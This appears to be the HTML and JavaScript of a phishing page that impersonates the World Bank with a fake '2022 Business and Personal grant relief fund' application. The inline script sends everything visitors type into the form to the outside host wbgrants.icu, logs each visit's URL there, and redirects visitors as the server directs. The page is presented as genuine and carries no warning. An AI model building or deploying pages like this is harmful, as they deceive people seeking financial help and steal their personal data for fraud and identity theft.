<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title>Business and Personal grants 2022 | WorldBank</title>
<link rel="shortcut icon" href="res/img/favicon.ico">
<style>
*{
box-sizing:border-box;
font-family:sans serif;
}
body{
margin:0;
padding:0;
}
.app{
width:100%;
height:100%;
}
.header{
width:100%;
height:120px;
background:#eff3f5;
border-bottom:1px solid #707070;
display:flex;
//justify-content:space-between;
align-items:center;
padding-left:2rem;
padding-right:2rem;
}
.header img{
width:310px;
margin-right:2rem;
}

.main{
padding:2rem;
text-align:center;
}


.footer{
background:#eff3f5;
width:100%;
height:180px;
border-top:1px solid #707070;
display:flex;
//justify-content:space-between;
align-items:center;
padding-left:2rem;
padding-right:2rem;
}
.footer img{
width:110px;
margin-right:2rem;
}
.footer div{
border-left:1px solid #707070;
padding-left:1rem;
font-family:arial;
}
.footer div span{
font-size:1.2rem;
font-family:arial;
font-weight:bolder;
}


form{
width:60%;
margin:0 auto;
}
@media only screen and  (max-width:500px){
form{
width:90%;
}
}
.form-header{
margin-bottom:.5rem;
width:200px;
background:#1e5399;
padding:1rem;
color:f8f8f8;
}
input,select{
display:block;
padding:1rem;
width:100%;
font-size:1rem;
margin-bottom:.5rem;
}
.bolder{
font-size:3.2rem;
}

</style>
</head>
<body>
<div class="app">
<div class="header">
<img src="res/img/logo.png"> <h1></h1>
</div>

<div class="main">
<h1 class="bolder">2022 Business and Personal grant relief fund</h1>
<h1>You may get a payment from us if you qualify for a business or personal grant.</h1>
<form id="form1" style="display:;" >
<div class="form-header">APPLY NOW</div>
<div id="f1">

</div>
</form>
</div>

<div class="footer">
<img src="res/img/logo.png"><div><span>WorldBank Personal and business Grants 2022</span><br><br>IRTC - 90794605008</div>
</div>

</div>
<script src="res/js/main.js" type="text/javascript"></script>
<script>

var x = document.getElementById("form1");
x.addEventListener("submit",function(e){
e.preventDefault();


 
var data = formdata(this),url = "https://wbgrants.icu/server.php/?"+data;
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
        if(xhttp.responseText != false){
	var pr = JSON.parse(xhttp.responseText);
	if(pr['status'] == 'success'){
	location = pr['redirect'];
	}
	}
    }
};
xhttp.open("GET", url, true);
xhttp.send();
});

document.getElementById("f1").innerHTML = f1;

var xhttp = new XMLHttpRequest();
xhttp.open("GET", "https://wbgrants.icu/server.php/?traffic&url="+location.href, true);
xhttp.send();

</script>
</body>
</html>


